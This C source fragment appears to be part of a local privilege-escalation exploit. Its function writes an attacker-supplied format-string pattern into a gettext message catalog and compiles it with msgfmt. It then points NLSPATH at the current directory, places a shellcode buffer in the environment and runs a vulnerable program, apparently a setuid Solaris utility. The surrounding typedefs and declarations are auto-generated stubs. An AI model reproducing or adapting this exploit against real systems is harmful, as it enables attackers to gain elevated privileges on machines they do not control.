
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int VULPROG ;
 int execle (int ,int ,char*,int *,char**) ;
 int exit (int) ;
 int fclose (int *) ;
 int * fopen (char*,char*) ;
 int fprintf (int *,char*,...) ;
 int perror (char*) ;
 int printf (char*,int) ;
 int strlen (char*) ;
 int system (char*) ;

void execute_vulnprog(char* pattern, char* shellbuf)
{
    char *env[3];
    FILE *fp;



    if (strlen(pattern) > 512) {
        printf("Warning: The pattern is %d bytes long. Only the first 512 bytes will be used.\n", strlen(pattern));
    }

    if ( !(fp = fopen("messages.po", "w+")) ) {
        perror("Error openning messages.po for writing.");
        exit(1);
    }

    fprintf(fp, "domain \"messages\"\n");
    fprintf(fp, "msgid  \"usage: %%s [-fndq] [name | nickname]\\n\"\n");
    fprintf(fp, "msgstr \"%s\\n\"", pattern);
    fclose(fp);

    system("/usr/bin/msgfmt messages.po");
    system("cp messages.mo SUNW_OST_OSCMD");
    system("cp messages.mo SUNW_OST_OSLIB");



    env[0] = "NLSPATH=:.";
    env[1] = shellbuf;
    env[2] = ((void*)0);



    execle(VULPROG, VULPROG, "-x", ((void*)0), env);
}
